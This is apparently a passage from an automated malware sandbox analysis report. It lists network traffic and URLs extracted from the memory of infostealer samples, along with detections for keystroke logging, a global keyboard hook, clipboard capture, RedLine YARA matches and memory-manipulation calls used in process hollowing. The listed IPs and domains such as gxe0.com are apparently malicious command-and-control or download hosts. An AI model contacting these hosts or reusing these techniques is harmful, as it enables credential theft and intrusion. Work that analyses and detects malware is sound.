                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 26 Nov 2024 07:15:43 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 26 Nov 2024 07:15:47 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 26 Nov 2024 07:15:48 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                    Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143/kgrfegimyutt~
                    Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143/mbuec
                    Source: Native_neworigin.exe, 0000000D.00000002.1778812791.00000000053C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.2I
                    Source: Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/
                    Source: Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/1
                    Source: alg.exe, 00000011.00000003.1712152929.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/aatpwqmmnwrfjm
                    Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/nkbiquv
                    Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/nkbiquvf=
                    Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/nkbiquvo
                    Source: Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/qmpy
                    Source: Native_neworigin.exe, 0000000D.00000002.1667563278.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/qmpyC
                    Source: alg.exe, 00000011.00000003.1561795732.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/eupqxdgegqjrgdpvd
                    Source: Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/qmpy/
                    Source: alg.exe, 00000011.00000003.1523918107.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
                    Source: alg.exe, 00000011.00000003.1523918107.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/d
                    Source: Native_neworigin.exe, 0000000D.00000003.1569284648.0000000005392000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/irvq
                    Source: alg.exe, 00000011.00000003.1523918107.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ulvxycyjutwdmypq
                    Source: alg.exe, 00000011.00000003.1532040197.000000000065F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1523809233.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ulvxycyjutwdmypq5
                    Source: alg.exe, 00000011.00000003.1523918107.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ulvxycyjutwdmypqN
                    Source: alg.exe, 00000011.00000003.1589672551.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/sqxdgegqjrgdpvi
                    Source: alg.exe, 00000011.00000003.2641931350.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/a
                    Source: alg.exe, 00000011.00000003.2641931350.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/btnkoeanfymxsstk
                    Source: alg.exe, 00000011.00000003.2641931350.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/d
                    Source: alg.exe, 00000011.00000003.2633384477.0000000000678000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2410341370.0000000000676000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2177399665.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/hrkmkab
                    Source: alg.exe, 00000011.00000003.2641931350.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/pnbkkgdjorsjoiow
                    Source: alg.exe, 00000011.00000003.2641931350.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/s
                    Source: alg.exe, 00000011.00000003.2641931350.0000000000659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/btnkoeanfymxsstkbat
                    Source: alg.exe, 00000011.00000003.2641931350.0000000000659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/pnckkgdjorsjoiowPA
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                    Source: Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://knjghuig.biz/
                    Source: powershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                    Source: powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
                    Source: Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.le
                    Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                    Source: powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: alg.exe, 00000011.00000003.2653651817.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2667859499.0000000000BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/
                    Source: alg.exe, 00000011.00000003.2668324932.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2653910451.0000000000BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/8
                    Source: C6dAUcOA6M.exe, C6dAUcOA6M.exe, 00000000.00000003.1300720331.0000000002B55000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1439616060.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.00000000209D0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1540095281.0000000021EA2000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1458982491.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020AA2000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1439616060.0000000021B3B000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1576898183.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, aymtmquJ.pif, 0000000B.00000000.1440342602.0000000000416000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.pmail.com
                    Source: alg.exe, 00000011.00000003.1966940811.0000000001590000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
                    Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: alg.exe, 00000011.00000003.2537534713.0000000000BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
                    Source: alg.exe, 00000011.00000003.2088475642.0000000000BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxFailed
                    Source: alg.exe, 00000011.00000003.2090116293.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2090557256.0000000000BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
                    Source: powershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: alg.exe, 00000011.00000003.2537614996.0000000000BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
                    Source: powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1445092943.00000000006B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/R
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020ADD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_Juqmtm
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020AF3000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1445092943.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020AC8000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1445092943.000000000063E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_Juqmtmyadyy
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1445092943.0000000000694000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_JuqmtmyadyyH
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1445092943.000000000063E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_Juqmtmyadyyc9
                    Source: C6dAUcOA6M.exe, 00000000.00000002.1445092943.00000000006BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com:443/yak2/233_Juqmtmyadyy2
                    Source: alg.exe, 00000011.00000003.2537698906.0000000000BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
                    Source: alg.exe, 00000011.00000003.2537698906.0000000000BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1
                    Source: alg.exe, 00000011.00000003.2537281630.0000000000BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
                    Source: powershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                    Source: alg.exe, 00000011.00000003.2718995164.0000000000BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/8
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                    Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.10:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49759 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49826 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, cPKWk.cs.Net Code: I3Mi2zn6x
                    Installs a global keyboard hook
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 13.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 40.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 32.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 13.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 32.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    .NET source code contains very large strings
                    Source: Trading_AIBot.exe.11.dr, cfRDgxIJtEfCD.csLong String: Length: 17605
                    Drops large PE files
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile dump: apihost.exe.14.dr 665670656Jump to dropped file
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D08670 NtUnmapViewOfSection,0_2_02D08670
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D08400 NtReadVirtualMemory,0_2_02D08400
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D07A2C NtAllocateVirtualMemory,0_2_02D07A2C
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_02D0DC8C
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02D0DC04
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D08D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02D08D70
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02D0DD70
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D07D78 NtWriteVirtualMemory,0_2_02D07D78
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D07A2A NtAllocateVirtualMemory,0_2_02D07A2A
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02D0DBB0
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D08D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02D08D6E
                    Source: C:\Users\Public\alpha.pifCode function: 7_2_00EF64CA NtQueryInformationToken,7_2_00EF64CA
